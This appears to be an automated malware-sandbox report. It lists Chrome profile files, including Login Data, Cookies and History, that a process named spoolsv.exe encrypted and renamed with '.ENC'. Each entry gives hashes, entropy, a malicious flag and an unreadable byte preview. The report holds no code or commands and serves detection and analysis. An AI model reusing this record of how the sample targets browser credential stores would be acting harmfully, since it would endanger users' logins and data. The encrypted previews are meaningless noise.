                                                                                                                                                                                                                                                      Entropy (8bit):7.99915719156081
                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                      SSDEEP:3072:sYxgIXq//Ndn4EwEjuUeeqVvatTnHD/cNTxZF8r1LAb/HoCHN6FRQp1EQn0:sYxnS/HRyU5mCtzD/Uty1LATEvQIQn0
                                                                                                                                                                                                                                                      MD5:B97567EEA3D95C2C24700A8944463277
                                                                                                                                                                                                                                                      SHA1:7F42E6019DAC2F60292C9917D963EF74DDF86A4D
                                                                                                                                                                                                                                                      SHA-256:9DEB6C29405F36E8B424B29A91D07A35DB66176F5FCBD4494FEB61463469565C
                                                                                                                                                                                                                                                      SHA-512:CE810138E863B9524B52B4FE4BFE7B330C5FF19AA09791587848886EC1F4A28202BEBF04C05EAD07593406F45BCA76BB3D5957CDE7304DB8E3D064824734C203
                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                      Preview:.j...t.....*.t...lS..].......X..x.q).T..pv.Mo.....rU...@).......N.x.N.....@...B..I'MzL.....\v:Y.mH..(;C..gC...q4.[/+[d.O....0.. t...KI.){.Hg.t..,P....t..ve.5b._r.,#...4.S.....x...n.....+.c.JP2.M.;....b.$..@...Ce.d..-.[..z....g.$w..Ur.t.l|...s...m.6..x.x......g.l,s.`s.L....1.c.....h...L..q.,e...~..;...x.k.U.....9..-.m~R.?.....e...?........S./c[.E...L.)...WR...x...pH...hF.AA.........N.;...l.X.U..S.u.[..EB=P......'!..A.S...-.....8.K.....r.3.O..ed........z.E.....-..v.&.O)#..(.|.@...<.9..^rUU5%...?..&.4_..0.@In.h/..\...&.../..+[W1.f.^.....BTW..P..[U~Rl.;..!.....j.s...B..Kc.....HP....P....v.r.....c....<..]Vw...W..W..$.-+,..%...!.U....H...yC_...o.I.~....?.....F?.s..W...0U...t....J..!.RxJ.h.@'}...>. ....m .o4R&.[......|.'w2..a.*.QQ}H..o|...A=...6...C..F.tu.%.=?w.S..>..2.y.C.y...;.Q$......|.&[8E......h......).ncK-.j..Y....V2....p.G.w....a..K..f.sJ....Ur.. B.%dt?....$.-l.....<zj!C.....U.......P.....F')....Aj.!{_..mj....7U%..m0.=...>....?.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History-journal.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                      Entropy (8bit):3.875
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:wn7rE:wnE
                                                                                                                                                                                                                                                      MD5:0DD2E8E1D8A34F14C6938491B88DE393
                                                                                                                                                                                                                                                      SHA1:69D0A4CCE263F2D7CEB43EC913A04D1E62F81E81
                                                                                                                                                                                                                                                      SHA-256:16058C351BE7CA0776CAAC47D44F389219130C2095CEF93C96ECD8791DA00AFE
                                                                                                                                                                                                                                                      SHA-512:70C570D951383C04AEFC362A62DA6C54F8E12730D3E3434A9A3513CD65E2305B08AB3A1546A02258E327667528D39BC6277A712C9965CC87C63486BE6F0D5DA0
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.u...1!gx>vp%g.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\InterestGroups.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):69648
                                                                                                                                                                                                                                                      Entropy (8bit):7.997525187994565
                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                      SSDEEP:1536:NeSUgDOKMD8tHX4iwjjFNnxmY/om/bHS+2UYZnxRYq05biHJ:eHWXTw3FNnxVL/D2UYZxR10he
                                                                                                                                                                                                                                                      MD5:02B77778D8326986BF4DDEB65F44A69A
                                                                                                                                                                                                                                                      SHA1:3EE1E53C73047707F78BB51707CC294E201EBE03
                                                                                                                                                                                                                                                      SHA-256:70344DC55C828321DA8260277152BB26F7595354B9093C6E21B7CE220CEFE554
                                                                                                                                                                                                                                                      SHA-512:E4B882165DCE6826C22FAB66DE45EAC6D14B32920E464CA373A52944D091B14962272F55AC1A8A1F7892467610782972472E7B258D35AD525EFF00C0F234A262
                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                      Preview:rS7n2.*........._.7.....H.P"HM8...a.E...Y.`...MM0.u...yZ^X..L..Gx-.c..,W...)g........?..vhp...._.{^..@B+p.>.(..........'..v...?..1{e+....D.W......A."...b>Th..#..P.fNJ.SA&...J8.......Do..vs.i].)...tf.e...L.x...~...........K.4.D..b.. .Q6.+...P.gQ`...w...Z....U...j.^<.!..cby0..,....<w..MC..H...8.'....cS.....[.......qt;..#.x...M9_R....c....:....x/..Pz..I.>?...JV#...~...[.a>7.r.10;... .q...p..."o..............jO.{.S..}.....S.t....*.>[L(vW.....>D.t+v..JCaG....jn^.........\2.......S.4a...s...{. ..d.3...l....K.M..r'.|#9o.K..}.q.=@...>.Bl... ...7;..\..?_x...g..,.....:j.25..,...M..`q.sW.[U.;......A...,..\... .W.j$.....=..j....P.*.~z..g...P....z...)_.~?.N..K.2........V..BZ..*..m2..".W1.M.c..4..4.$uH-...4.$t......<. ..?...C..q.....].\....B..m.X.>.}$.y....$.Jf...7x.f'....z\.&[.7l...N.C"...WR7?..U..j...V.u_y.....>./.K.Giv.P....h....E........}.^b.z....I.~a..[.V.9.1.u.....J.6..Q-..y..[.g+M....45..O6...U.I...e....V.$..B...a...ZG4xdp.zQ{?....O.f=....mxtR..] .S....x

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\LOG.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                      Entropy (8bit):3.875
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:wn7rE:wnE
                                                                                                                                                                                                                                                      MD5:0DD2E8E1D8A34F14C6938491B88DE393
                                                                                                                                                                                                                                                      SHA1:69D0A4CCE263F2D7CEB43EC913A04D1E62F81E81
                                                                                                                                                                                                                                                      SHA-256:16058C351BE7CA0776CAAC47D44F389219130C2095CEF93C96ECD8791DA00AFE
                                                                                                                                                                                                                                                      SHA-512:70C570D951383C04AEFC362A62DA6C54F8E12730D3E3434A9A3513CD65E2305B08AB3A1546A02258E327667528D39BC6277A712C9965CC87C63486BE6F0D5DA0
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.u...1!gx>vp%g.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                      Entropy (8bit):3.875
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:wn7rE:wnE
                                                                                                                                                                                                                                                      MD5:0DD2E8E1D8A34F14C6938491B88DE393
                                                                                                                                                                                                                                                      SHA1:69D0A4CCE263F2D7CEB43EC913A04D1E62F81E81
                                                                                                                                                                                                                                                      SHA-256:16058C351BE7CA0776CAAC47D44F389219130C2095CEF93C96ECD8791DA00AFE
                                                                                                                                                                                                                                                      SHA-512:70C570D951383C04AEFC362A62DA6C54F8E12730D3E3434A9A3513CD65E2305B08AB3A1546A02258E327667528D39BC6277A712C9965CC87C63486BE6F0D5DA0
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.u...1!gx>vp%g.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\CURRENT.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):32
                                                                                                                                                                                                                                                      Entropy (8bit):4.9375
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:QRzgTczBv:Q5d
                                                                                                                                                                                                                                                      MD5:328FC1F4C693CE30D6A0FB47D34D59E3
                                                                                                                                                                                                                                                      SHA1:A49BAAFDEFA3CE958AA56709FF598FBA601A8798
                                                                                                                                                                                                                                                      SHA-256:F6F0E310BCA7FD98AA03FE19DDCBB88434AFBBBC51A64774405F82DD457CBA2B
                                                                                                                                                                                                                                                      SHA-512:B1CF96413C6D8BEB6D3A6D26CCA9068DF4B7EAD78D4C0E7454AC7D4B938BA49311B060A6C7B8277C7A8A667C6A9A674C0063EA05EAA2F205F110ADB9534A28BC
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:...Y.4.t*..V.h=.#..x..k..Y.$.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\LOCK.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                      Entropy (8bit):3.875
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:wn7rE:wnE
                                                                                                                                                                                                                                                      MD5:0DD2E8E1D8A34F14C6938491B88DE393
                                                                                                                                                                                                                                                      SHA1:69D0A4CCE263F2D7CEB43EC913A04D1E62F81E81
                                                                                                                                                                                                                                                      SHA-256:16058C351BE7CA0776CAAC47D44F389219130C2095CEF93C96ECD8791DA00AFE
                                                                                                                                                                                                                                                      SHA-512:70C570D951383C04AEFC362A62DA6C54F8E12730D3E3434A9A3513CD65E2305B08AB3A1546A02258E327667528D39BC6277A712C9965CC87C63486BE6F0D5DA0
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.u...1!gx>vp%g.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\LOG.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):352
                                                                                                                                                                                                                                                      Entropy (8bit):7.3355267550701555
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:6:mqwPLbpY4ktL4GsDRIFVM1UnOGrRT5QOFMWh71/w+1qqJCBl4K33D0WS:6b+49WtZrLFMWPw+OP3LS
                                                                                                                                                                                                                                                      MD5:55B6FE10C9227C5AD443628CF4579E00
                                                                                                                                                                                                                                                      SHA1:5565C1EF6B9FE7DC1863463FC3D3FE648001F6FD
                                                                                                                                                                                                                                                      SHA-256:95079727087E5F5641FE92E865BA07945CB94E57E58290EACB92217109353443
                                                                                                                                                                                                                                                      SHA-512:A76EF6E8FFD57EC699F40F4C6E4BFCF5EC660E6361C98A13779B6450C4730959FF6FAC3D9E4453D83732CAFE90E9ABABBAA37BB0C6F74BB3DAAE44A76A89F983
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.<....|......}..#.QW........@..,9.$...w[...#....cnH.5uns.C.uu..i.....s;...H...S..gI.zX..../.!I...@_._AR./b.=&.b..+;)).q..YR..~..~r......C6@.0;.R..m(....jt...&..21....9S.g....C&.....$.m...UIB. ..X~....H.!.........E......?j......)_.3pS.D..W.4....u7.....>.la.9{........o3/..-...8W.D.....;[....>.Lr.r....<{#k.1i....l..d....q~........1.....D..h..

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\LOG.old.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):352
                                                                                                                                                                                                                                                      Entropy (8bit):7.399530519311583
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:6:mqwwu/lQU/LzZnl/F4fBWZbqRVDaVjHKPicddlWTiOPTPcBOtUxH97H0:7aQeFlqfgZuAjH4dlWGErwcUP4
                                                                                                                                                                                                                                                      MD5:195AF5AEE7C0B9CE92B55B7FA59D3B3E
                                                                                                                                                                                                                                                      SHA1:868B6E1E0BE0B3195451A44B5F628135F3B2DB11
                                                                                                                                                                                                                                                      SHA-256:3A3CD25E3E80EC962141DB087F5816EFD293F4F27D7A6A21FA1E082DF39EDD76
                                                                                                                                                                                                                                                      SHA-512:1B7DF0B09B4EEC8E100312A7D414B50A61A21173375FF2CEDCD6DB0373F31190404DAE953D1AF417851FBFC6E4EFDAFAD53A33D42B340EE1AC41668D6108108C
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.<....|......}.j..I._`.*.nd..G.j.......8).o.....w.U0d.0....E..k.J.,CdlB-.~.."+.......a......-.../._%..tH........v..E9..w.H.:C...CX.....I6...}2E.S.......I7H.E.+.N.)....Z..9Q...I..k..M.NE$5.Y.......,.~jG...f".<.......x....Q.v...N;..!V.4.q3..U.6vO.C...*.].$&..4PzN.r.z....d..$;...4...}..!.x..:]..[..q.......(..H..4L..3./yT*..9`NV.C.D~H

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\MANIFEST-000001.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):48
                                                                                                                                                                                                                                                      Entropy (8bit):5.543295834054493
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:qb0z5ZjCY:+aH
                                                                                                                                                                                                                                                      MD5:00B5963CADCB5E972047846E44EE2632
                                                                                                                                                                                                                                                      SHA1:3741D074C652E62798A616ED56C811482AF90C65
                                                                                                                                                                                                                                                      SHA-256:AD5D4ADA9FA65FCFCC5B74692628D26993377029E512DC6FC103A8819650AD66
                                                                                                                                                                                                                                                      SHA-512:ACC0812854372F9CE7AE2854D5EDB6D4B02D820E275524CEDA2329495CCE7D0CB3E8455A426E67BBBAA8CA2F5C1701D68FF1444DD0318EEE647717EC264B308E
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:...P...`&)....Y..R.r...........yT.?.......

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account-journal.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                      Entropy (8bit):3.875
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:wn7rE:wnE
                                                                                                                                                                                                                                                      MD5:0DD2E8E1D8A34F14C6938491B88DE393
                                                                                                                                                                                                                                                      SHA1:69D0A4CCE263F2D7CEB43EC913A04D1E62F81E81
                                                                                                                                                                                                                                                      SHA-256:16058C351BE7CA0776CAAC47D44F389219130C2095CEF93C96ECD8791DA00AFE
                                                                                                                                                                                                                                                      SHA-512:70C570D951383C04AEFC362A62DA6C54F8E12730D3E3434A9A3513CD65E2305B08AB3A1546A02258E327667528D39BC6277A712C9965CC87C63486BE6F0D5DA0
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.u...1!gx>vp%g.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data-journal.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                      Entropy (8bit):3.875
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:wn7rE:wnE
                                                                                                                                                                                                                                                      MD5:0DD2E8E1D8A34F14C6938491B88DE393
                                                                                                                                                                                                                                                      SHA1:69D0A4CCE263F2D7CEB43EC913A04D1E62F81E81
                                                                                                                                                                                                                                                      SHA-256:16058C351BE7CA0776CAAC47D44F389219130C2095CEF93C96ECD8791DA00AFE
                                                                                                                                                                                                                                                      SHA-512:70C570D951383C04AEFC362A62DA6C54F8E12730D3E3434A9A3513CD65E2305B08AB3A1546A02258E327667528D39BC6277A712C9965CC87C63486BE6F0D5DA0
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.u...1!gx>vp%g.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):40976
                                                                                                                                                                                                                                                      Entropy (8bit):7.995212043857158
                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                      SSDEEP:768:NAfWt6G8LaQzZDu++/XGxB/O5BPoqx/OFxCb8YCe7FieqVMkLfXkqZb:NmWYJzZD/+/WnOBwwGCb8PjeIXtZb
                                                                                                                                                                                                                                                      MD5:863AF3E8857EA84B078EDB6CA1FB964F
                                                                                                                                                                                                                                                      SHA1:D4CD3C63D91E0B5B26D25FFB4465801D4236D135
                                                                                                                                                                                                                                                      SHA-256:5AB6B0DFE106DCBCAFC7AF6AB83445CA377577BED476CBEA5F9DC3219C84B6A2
                                                                                                                                                                                                                                                      SHA-512:CF36074A62FC90A22C9403F3D2B3D248014D4CC1A5C8FE1C26F8396E92BFD31B7F2AAE41F1903E24BD88EF48512472428E5B8578A26B8FA7AC4BBC4B00EF720B
                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                      Preview:rS7n2.*.........tpT...........l3..;d.M..@...#5....^]........yCv......3...P..O0..RB....CU.....]..x.T>X.yQ^4....".s..8iO..P....>.~......Dd!/.z'd...+8N..9{.O*7y.sG?M Q].!B.+...r..._.u&L.F.(..3..E.Z.|....e..^...$1....g.i3..,7Q..7.......\......*?C,b......>e@.0..m/...).o...g..;....%.O...0......)..?..`.mY....G$o.;w..|K.......FD...O7.......^.{......y.2...O<...I7.PW...\.,......f../.......y..h.Ac.h...Q.3..DI\;...Sz..{.S..=>..2R.....0.........M..Fi|.0......'.n.6[.....).Q.....j....$S..9.|...O?.....xu.....=.,...+o..n.)........$........OA....(.5..pL.].q....."*#[x..w.A.x.Gfz.o...{..0a.I..fkt\y7......I'...G..b"<...Eg._1...f...#..Wd..{.&,..-.4..l\..(1...V.....&`jz.%$.,0.....9.J]#.So..l.}..c.............:...y.{7g...'M..1.j.....I...#.......'A.I)u..H..v.gIl.PF.J.^3k.t...g2m.XZ'.1....&......,..'KY...8c'.fz...j.F. .&.....Cy....i}.x|)!.|2f.H.O..(.....{........:..V.:,.....^./...Z(...$.$xym...^E..............s.<.41..:....;.P........{..#...F.x.....c.J..d...&.X9so~.8...+..B{cF.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network Action Predictor-journal.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                      Entropy (8bit):3.875
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:wn7rE:wnE
                                                                                                                                                                                                                                                      MD5:0DD2E8E1D8A34F14C6938491B88DE393
                                                                                                                                                                                                                                                      SHA1:69D0A4CCE263F2D7CEB43EC913A04D1E62F81E81
                                                                                                                                                                                                                                                      SHA-256:16058C351BE7CA0776CAAC47D44F389219130C2095CEF93C96ECD8791DA00AFE
                                                                                                                                                                                                                                                      SHA-512:70C570D951383C04AEFC362A62DA6C54F8E12730D3E3434A9A3513CD65E2305B08AB3A1546A02258E327667528D39BC6277A712C9965CC87C63486BE6F0D5DA0
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.u...1!gx>vp%g.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):20496
                                                                                                                                                                                                                                                      Entropy (8bit):7.991445964242658
                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                      SSDEEP:384:N5iLwEu86kZf7NWdBtXfnGvMFZH8BA/3ECGPRB1bLCZipyWQrPxId3jjpx:N5ik9kZxY7Zca/3ELJ3ryW+ZIdzjpx
                                                                                                                                                                                                                                                      MD5:6580F0D5F15090FDD321875B55178AFD
                                                                                                                                                                                                                                                      SHA1:5E5D29E31CDDA6B76D6777D948F9A22B9FD6ACEC
                                                                                                                                                                                                                                                      SHA-256:2F0D77C58ADD4532A7BF3569439F8D5B6054EE6F0E80196477CF3E623E350AC8
                                                                                                                                                                                                                                                      SHA-512:5D59F971C8DA350D52019F0A66B333AC0B74A66711D7181DC31F0E0F3FC2CA25EB8A70F1B8E9702661D3AD843AC972F4A5FDE2CCC278D71E2F16BAA7ADF1AB70
                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                      Preview:rS7n2.*........".9l.>...q..............%...e...8QdL.3....X..Y)F. z1./.2W.4S...zB...O......:y_.z.... e.L.!...".1.....CG_X.)T../a.V.......w....i.C.D_.I.T..5.._...(v.;{.4.w.RAu'O.a.j..~w.tCj..5...S..T.W.y:l.g.[..w.._"....".~...W..D....^P.cR..h......`..._......=.....J@...6[WX.\.=1.]...#.Fo&..w.I..W3........<..#..48D..U..M.~.eq...@..Mry..8...MV..t^^p..#.&...Qu!.....r......i7Y.N@.Nh...*.i..1......&.G.J/....#@{.J.X...>q.wF...#...j..8.(FJ::Z....(8.\~...ZJ. ....d....=...u..|...qO..c>...h'.m:........2.D$b...}~"s..D.t....1.a`5T.../.lc..39941%...lA.-.~d..~ICDK.....:._`uS.....>.G..m.l.r...[...u....~..I..DI...1+3.%}|M ... .........=..S/..dhQ2..*0.....)....K2.(.)..R.o..L..M.....L...lf*m.4?......e..Ll.O=..J..Fx)Z.....1.#...={.>...8....5."O.;.N.[,..8-...l?d..<t-C...K.'.B.-8..XB...".n...p.h...v..T.]........9......79..a0.!^.V.yG..Su.s..yc......z.O..sj.....k......Iu0...2..+O.BN...S+.T@.*2&..(..8A(/.. "c../.O-....D,^c.g...'.....}.RA@.t(.....

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):2016
                                                                                                                                                                                                                                                      Entropy (8bit):7.898815538551172
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:48:YoQ0Xm7U2IiAG0K26OQJ471qrKxK2sbj3SS:Yop2A2wG0K2u+gbJ
                                                                                                                                                                                                                                                      MD5:CCF30B7B4E30CCB9F42A87F7DEF64FB2
                                                                                                                                                                                                                                                      SHA1:88E7685F5BE22CFB215436A63AA3E9D1B29D3B3A
                                                                                                                                                                                                                                                      SHA-256:E07D394E7E44686E49A3F0C4DC2D6CF50E7DFDD051BE909166459093C75ADEBA
                                                                                                                                                                                                                                                      SHA-512:7359313288DBB654FC5A0700353A848C5C7297ACF48E616ABB56803B873220D937CD90972FB3325C5A6B69DD5EB00C85433E2DEB85131AA02BBFAD98E23F599D
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..j%S..K.x..&.0y.....w.s.D..7u%.Z..m...H..L......tt.*+.....4..e.8.....~.@R;4.2E.o..[.o.`...........'Z..t.'x..t...6e.n&.CU.+.o...zq.+.G..3..7......~o....S..,.QP.....j.@...Y<Ld._R.L...rW.....8.F.+..Z...K.....OT%....dsE?@....^K.6..r...?.a..?....s.B......;=.zS..%.i&7.G*E...d.W{.k..5U.#..W%.J/f<...fq...O......t.qvA.s.W.Qo.+r.p[.h.....^eI]m1{.[..%..8*...r.....^..Q.T&.8..M.D~.E......z.Ti.%.h....$6..]{..q..=..:/...S(.,.$~-.874.*s.S@6..s.Q(J8.:..\J..Y..Yl....DV....W.H....z...s,.....>.DO...`..7-.......c.H...........f..../..!gt../....N."........=`.[.....*..Y.b....9. .}{.b.....i.bN.@.LZ]%~e5Wi.0.-..:..V......y..$N..r{:.\... .1}=u..W..Nq.,.EB...u..FV"}..HFK....D.\.S....+e...w.p.....>;.L.Hx.....YB....:@I.<s...085.H...,q)T.}....5.7..J.EVe..9.]...O.....Z..%..#5.R.=.\A.....nY.?..5....2.......`...RM.....X)e.....u...|...0..%/..A.QKi.....N..a...U...|......j..T.......?...d@...@/?K..[..n..>..U....a..G.O5.C.c..l.iX.\>.2).5.b...}.stl....?.^..l_..

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\NetworkDataMigrated.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                      Entropy (8bit):3.875
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:wn7rE:wnE
                                                                                                                                                                                                                                                      MD5:0DD2E8E1D8A34F14C6938491B88DE393
                                                                                                                                                                                                                                                      SHA1:69D0A4CCE263F2D7CEB43EC913A04D1E62F81E81
                                                                                                                                                                                                                                                      SHA-256:16058C351BE7CA0776CAAC47D44F389219130C2095CEF93C96ECD8791DA00AFE
                                                                                                                                                                                                                                                      SHA-512:70C570D951383C04AEFC362A62DA6C54F8E12730D3E3434A9A3513CD65E2305B08AB3A1546A02258E327667528D39BC6277A712C9965CC87C63486BE6F0D5DA0
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.u...1!gx>vp%g.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Reporting and NEL-journal.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                      Entropy (8bit):3.875
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:wn7rE:wnE
                                                                                                                                                                                                                                                      MD5:0DD2E8E1D8A34F14C6938491B88DE393
                                                                                                                                                                                                                                                      SHA1:69D0A4CCE263F2D7CEB43EC913A04D1E62F81E81
                                                                                                                                                                                                                                                      SHA-256:16058C351BE7CA0776CAAC47D44F389219130C2095CEF93C96ECD8791DA00AFE
                                                                                                                                                                                                                                                      SHA-512:70C570D951383C04AEFC362A62DA6C54F8E12730D3E3434A9A3513CD65E2305B08AB3A1546A02258E327667528D39BC6277A712C9965CC87C63486BE6F0D5DA0
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.u...1!gx>vp%g.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Reporting and NEL.ENC

